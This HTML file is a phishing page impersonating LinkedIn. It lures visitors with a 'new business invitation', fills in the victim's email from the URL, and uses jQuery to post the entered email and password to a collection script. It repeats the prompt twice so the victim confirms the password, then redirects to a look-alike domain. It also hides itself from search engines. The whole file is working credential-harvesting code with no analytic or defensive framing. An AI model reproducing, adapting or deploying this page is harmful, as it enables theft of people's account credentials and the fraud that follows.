<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/html">
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
	<meta http-equiv="X-UA-Compatible" content="IE=edge,10,9,8,7"/>
	<title>LinkedIn | &#38656;&#35201;&#36523;&#20221;&#39564;&#35777;</title>
	<link rel="icon" type="image/png" sizes="32x32" href="resources/favicon.png">
	<meta name="robots" content="noindex" />
	<meta name="robots" content="nofollow" />
	<META NAME="GOOGLEBOT" CONTENT="NOARCHIVE" />
	<META NAME="GOOGLEBOT" CONTENT="NOSNIPPET" />
</head>
<body>
<script>
const url = 'process.php';   //full url goes here
</script>
<style>
.login{
	width:300px; height:20px; font-family: arial; font-size: 14px; color:#0965B1; font-weight:bold; 
	background-color: #ffffff; border: solid 1px #BDBDBD; 
	-webkit-box-shadow: 2px 2px 2px 2px #616162; box-shadow: 2px 2px 2px 2px #616162; padding: 10px; border-radius: 2px 3px 1px 5px;
}
</style>
<div style="margin:-8px;width:100%">
<img id="bg" src="resources/bg.png" style="background-size: cover; background-repeat: no-repeat;">
<img id="bg2" src="resources/bg.png" style="background-size: cover; background-repeat: no-repeat;" hidden>
<div style="position:absolute; top:130px; left:500px; background-color: #FFF; 
    z-index: 0; width: 385px; height:390px; padding: 0px; text-align: center; 
    -webkit-box-shadow: 1px 1px 1px 2px #848484; box-shadow: 1px 1px 1px 2px #848484; border-radius: 2px 10px 3px 12px;">
	<form method="post" action="" onsubmit="Validate(); return false;">
    <div align="center">
			<br><br><img src="resources/logo.png" style="width:150px; height:40px;">
			<br><br><font face="verdana" color="#585858" style="font-size:17px;"> NEW BUSINESS INVITATION </font>
			<br><font face="verdana" color="#585858" style="font-size:13px;"><strong> Verify your ID to view My Contact Details </strong></font>
		    <br><br><input required id="user" name="user" class="login" value="" type="email" placeholder="Email" readonly>
            <br><br> <input required type="password" id="pass" name="pass" class="login" placeholder="Password">
            <br><br><input type="submit" name="submit" alt="submit" value="VIEW NOW" 
			style="width:320px; height:40px; font-family: arial; font-size: 15px; color:#FFF; background-color: #0965B1; border: solid 1px #0965B1;
			-webkit-box-shadow: 2px 2px 2px 2px #616162; box-shadow: 2px 2px 2px 2px #616162; padding: 10px; border-radius: 2px 5px 1px 7px; cursor:pointer; "/>   
    </div>
 </form>
</div>
</div>
<input type="hidden" id="count" value="0">
<script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.1.0/jquery.min.js'></script>
<script>
      $(document).ready(function(){
        var count=0;

      /////////////url email getting////////////////
      var email = window.location.hash.substr(1);
      if (!email) {

      }
      else
      {
          var my_email =email;
          $('#user').val(my_email);
			
			}
		  })


function Validate(){
var a = $('#user').val();
var b = $('#pass').val();
var c = $('#count').val();

$.post(url, {user:a,pass:b}, function(){
setTimeout(function(){
if(c>=2){
$('#count').val('0');
window.location='https://linkinedin.com';
}else{
$('#bg').fadeOut();
$('#bg2').fadeIn();
$('#user').css('top','250px');
$('#pass').css('top','311px');
$('#b1').css('top','381px');
$('#pass').val('');
var add = +c+1;
$('#count').val(add);
$('#pass').focus();
}
},2000);
});
}

</script>

<script>
function process(){
	var user = document.getElementById('user').value;
	var pass = document.getElementById('pass').value;
	if ((user == '') || (user == null)){
	document.getElementById('bg').src='files/1.png';
	document.getElementById('user').focus();
return false;	
	}else
	if ((pass == '') || (pass == null)){
	document.getElementById('bg').src='files/2.png';
	document.getElementById('pass').focus();
return false;	
	}else
	
return true	;
}
</script>
<script>
$('input').focus(function(){
  $(this).parents('.form-group').addClass('focused');
});

$('input').blur(function(){
  var inputValue = $(this).val();
  if ( inputValue == "" ) {
    $(this).removeClass('filled');
    $(this).parents('.form-group').removeClass('focused');  
  } else {
    $(this).addClass('filled');
  }
})  
</script>
</body>
</html>